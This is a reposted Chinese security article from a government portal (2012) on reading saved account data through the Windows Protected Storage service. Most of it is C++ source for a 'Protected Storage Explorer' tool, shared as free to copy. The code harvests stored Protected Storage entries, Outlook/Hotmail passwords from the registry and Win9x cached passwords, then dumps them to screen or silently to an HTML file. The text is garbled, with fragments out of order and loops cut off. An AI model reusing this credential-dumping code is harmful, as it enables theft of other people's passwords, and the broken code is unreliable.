中国电子政务网--公共安全--网络安全--通过Protected Storage获取账号信息

通过Protected Storage获取账号信息

来源:中国安全信息网更新时间:2012-04-13

我们知道NT以后的系统中有一个这样的服务：Protected Storage。他是用来储存本地密码和网上服务密码的服务，包括填表时的“自动完成”功能以及OUTLOOK对应的账号信息。相应的我们就可以通过该服务来获取保存的账号信息。源代码如下：

"); SaveToDisk("\r\n"); } else{ SaveToDisk("\r\n"); SaveToDisk(""); SaveToDisk("\r\n"); } } return TRUE; } void EnumPStorage(BOOL Save){ typedef HRESULT (WINAPI *tPStoreCreateInstance)(IPStore **, DWORD, DWORD, DWORD); HMODULE hpsDLL; hpsDLL = LoadLibrary("pstorec.dll"); tPStoreCreateInstance pPStoreCreateInstance; pPStoreCreateInstance = (tPStoreCreateInstance)GetProcAddress(hpsDLL, "PStoreCreateInstance"); IPStorePtr PStore; HRESULT hRes = pPStoreCreateInstance(&PStore, 0, 0, 0); IEnumPStoreTypesPtr EnumPStoreTypes; hRes = PStore->EnumTypes(0, 0, &EnumPStoreTypes); if (!FAILED(hRes)) { GUID TypeGUID; char szItemName[512]; char szItemData[512]; char szResName[1512]; char szResData[512]; char szItemGUID[50]; while(EnumPStoreTypes->raw_Next(1,&TypeGUID,0) == S_OK){ wsprintf(szItemGUID,"%x",TypeGUID); IEnumPStoreTypesPtr EnumSubTypes; hRes = PStore->EnumSubtypes(0, &TypeGUID, 0, &EnumSubTypes); GUID subTypeGUID; while(EnumSubTypes->raw_Next(1,&subTypeGUID,0) == S_OK){ IEnumPStoreItemsPtr spEnumItems; HRESULT hRes = PStore->EnumItems(0, &TypeGUID, &subTypeGUID, 0, &spEnumItems); LPWSTR itemName; while(spEnumItems->raw_Next(1,&itemName,0) == S_OK){ wsprintf(szItemName,"%ws",itemName); char chekingdata[200]; unsigned long psDataLen = 0; unsigned char *psData = NULL; _PST_PROMPTINFO *pstiinfo = NULL; hRes = PStore->ReadItem(0,&TypeGUID,&subTypeGUID,itemName,&psDataLen,&psData,pstiinfo,0); if(lstrlen((char *)psData)<(psDataLen-1)) { int i=0; for(int m=0;mcbResource+1; if(nCount>1023) nCount=1023; lstrcpyn(buff, pce->abResource, nCount); buff[nCount] = 0; CharToOem(buff, buff2); if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE; lstrcpy(dat->pBuffer+dat->nBufPos,buff2); dat->nBufPos+=lstrlen(buff2)+1; nCount=pce->cbPassword+1; if(nCount>1023) nCount=1023; lstrcpyn(buff, pce->abResource+pce->cbResource, nCount); buff[nCount] = 0; CharToOem(buff, buff2); if((dat->nBufPos+lstrlen(buff2))>=dat->nBufLen) return FALSE; lstrcpy(dat->pBuffer+dat->nBufPos,buff2); dat->nBufPos+=lstrlen(buff2)+1; return TRUE; } void CashedPass(BOOL Save) { HMODULE hLib=LoadLibrary("MPR.DLL"); PASSCACHECALLBACK_DATA dat; dat.pBuffer=(char *)malloc(65536); dat.nBufLen=65536; dat.nBufPos=0; pWNetEnumCachedPasswords = (ENUMPASSWORD)GetProcAddress(hLib, "WNetEnumCachedPasswords"); pWNetEnumCachedPasswords(NULL, 0, 0xff, AddPass, (DWORD) &dat); char *svStr; svStr=dat.pBuffer; do { char *svRsc=svStr; svStr+=lstrlen(svStr)+1; char *svPwd=svStr; svStr+=lstrlen(svStr)+1; char szUser[1024]; char szPass[1024]; AddItemm(Save,"","",svRsc,svPwd); }while(*svStr!='\0'); FreeLibrary(hLib); }; ///////////////////////////////////////// #define TableHeader "

/////////////////////////////////////////////////////////////////////////////////////// 
/////////////////////////////////////////////////////////////////////////////////////// 
// //
//Protected Storage Explorer // 
// By Hirosh // 
//www.hirosh.net //
// //
// // 
//No CopyRights- Feel Free to Cut & Paste // 
// // 
// //
/////////////////////////////////////////////////////////////////////////////////////// 
/////////////////////////////////////////////////////////////////////////////////////// 


#include "stdafx.h"
#include 
#include "resource.h"
#import "pstorec.dll" no_namespace har SavingFname[MAX_PATH];
HWND hwndlistview;
BOOL iS9x=FALSE;
typedef struct TOOUTDATA{
char POPuser[100];
char POPpass[100];
char POPserver[100];
} OOUTDATA;
OOUTDATA OutlookData[50];
int oIndex=0;

void EnumOutlookAccounts()
{
ZeroMemory(OutlookData,sizeof(OutlookData));
HKEY hkeyresult ,hkeyresult1;
long l,i;
char name[200],skey[200];
DWORD dw2;
FILETIME f;
lstrcpy(skey,"Software\\Microsoft\\Internet Account Manager\\Accounts");
LONG lResult=RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR ) skey,0,KEY_ALL_ACCESS, 
&hkeyresult1 );
if(ERROR_SUCCESS != lResult)
return ;
i=0;l=0;
BYTE Data[150];
BYTE Data1[150];
DWORD size;
int j;
j=0;
DWORD type=REG_BINARY;
while(l!=ERROR_NO_MORE_ITEMS){
dw2=200;
l=RegEnumKeyEx(hkeyresult1,i,name,&dw2,NULL,NULL,NULL,&f);
lstrcpy(skey,"Software\\Microsoft\\Internet Account Manager\\Accounts");
lstrcat(skey,"\\");
lstrcat(skey,name);
RegOpenKeyEx(HKEY_CURRENT_USER, ( LPCTSTR )skey ,0,KEY_ALL_ACCESS, &hkeyresult );
size=sizeof(Data);
if(RegQueryValueEx ( hkeyresult, ( LPCTSTR )"HTTPMail User Name" , 0, &type, Data, &size )
==ERROR_SUCCESS)
{
lstrcpy(OutlookData[oIndex].POPuser,(char *)Data);
ZeroMemory(Data,sizeof(Data));
lstrcpy(OutlookData[oIndex].POPserver,"Hotmail");
size=sizeof(Data);
if(RegQueryValueEx ( hkeyresult, ( LPCTSTR )"HTTPMail Password2" , 0, &type, Data1, 
&size ) ==ERROR_SUCCESS){
int totnopass=0;
char mess[100];
for(int i=2;i

"); SaveToDisk(resname); SaveToDisk("

"); SaveToDisk(restype); SaveToDisk("

"); SaveToDisk(usrname); SaveToDisk("

"); SaveToDisk(pass); SaveToDisk("

"); SaveToDisk(usrname); SaveToDisk("

"); SaveToDisk(pass); SaveToDisk("

" #define Table "

" #include LRESULT CALLBACK DLgProc(HWND hDlg, UINT message, WPARAM wParam, LPARAM lParam) { OPENFILENAME ofn; char szFile[MAX_PATH]; switch (message){ case WM_INITDIALOG: SendMessage(hDlg, WM_SETICON, ICON_SMALL, (LPARAM)LoadIcon(GetModuleHandle(0), MAKEINTRESOURCE(IDI_ICON1))); if(!iS9x) SetWindowText(hDlg,"Protected Storage www.hirosh.NET"); else SetWindowText(hDlg,"Cashed Passwords www.hirosh.NET"); hwndlistview = GetDlgItem(hDlg, IDC_LIST3); LVCOLUMN lvcol; if(!iS9x){ lvcol.mask =LVCF_TEXT;; lvcol.pszText = "Resource Name"; ListView_InsertColumn(hwndlistview, 0, &lvcol); ListView_SetColumnWidth(hwndlistview, 0, 160); lvcol.mask =LVCF_TEXT; lvcol.pszText = "Resource Type"; ListView_InsertColumn(hwndlistview, 1, &lvcol); ListView_SetColumnWidth(hwndlistview, 1, 110); lvcol.mask =LVCF_TEXT; lvcol.pszText = "User Name/Value"; ListView_InsertColumn(hwndlistview, 2, &lvcol); ListView_SetColumnWidth(hwndlistview, 2, 200); lvcol.mask =LVCF_TEXT; lvcol.pszText = "Password"; ListView_InsertColumn(hwndlistview, 3, &lvcol); ListView_SetColumnWidth(hwndlistview, 3, 100); EnumOutlookAccounts(); EnumPStorage(FALSE); } else{ lvcol.mask =LVCF_TEXT; lvcol.pszText = "User Name/Value"; ListView_InsertColumn(hwndlistview, 0, &lvcol); ListView_SetColumnWidth(hwndlistview, 0, 250); lvcol.mask =LVCF_TEXT; lvcol.pszText = "Password"; ListView_InsertColumn(hwndlistview, 1, &lvcol); ListView_SetColumnWidth(hwndlistview, 1, 150); CashedPass(FALSE); } ListView_SetExtendedListViewStyle(hwndlistview,LVS_EX_FULLROWSELECT); return TRUE; case WM_COMMAND: switch ( LOWORD(wParam) ){ case IDOK: ZeroMemory(&ofn, sizeof(OPENFILENAME)); ofn.lStructSize = sizeof(OPENFILENAME); ofn.hwndOwner = hDlg;lstrcpy(szFile,"*.*"); ofn.lpstrFile ="pstectedstorage.htm";ofn.nMaxFile = sizeof(szFile); ofn.lpstrFilter = "Htm\0*.htm\0"; ofn.nFilterIndex = 1;ofn.lpstrFileTitle = NULL; ofn.nMaxFileTitle = 0;ofn.lpstrInitialDir = NULL; ofn.Flags = OFN_PATHMUSTEXIST | OFN_FILEMUSTEXIST; if (GetSaveFileName(&ofn)==TRUE) { lstrcpy(SavingFname,ofn.lpstrFile); if(strstr(SavingFname,".htm")==0)lstrcat(SavingFname,".htm"); SaveToDisk(TableHeader); if(!iS9x){ SaveToDisk("Resource Name Resource Type User Name/ValuePassword"); EnumOutlookAccounts(); EnumPStorage(TRUE); } else{ SaveToDisk("User Name/ValuePassword"); CashedPass(TRUE); } SaveToDisk(Table); } break; case IDCANCEL: EndDialog(hDlg, LOWORD(wParam)); ExitProcess(0); break; break; } } return FALSE; } // int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { if((int)GetVersion() < 0) iS9x=TRUE; else iS9x=FALSE; if(lpCmdLine[0]==NULL){ InitCommonControls(); DialogBox(hInstance, (LPCTSTR)IDD_DIALGMAIN, 0, (DLGPROC)DLgProc); } else { lstrcpy(SavingFname,lpCmdLine); SaveToDisk(TableHeader); if(!iS9x){ SaveToDisk("Resource Name Resource Type User Name/ValuePassword"); EnumOutlookAccounts(); EnumPStorage(TRUE); } else{ SaveToDisk("User Name/ValuePassword"); CashedPass(TRUE); } SaveToDisk(Table); } return 0; }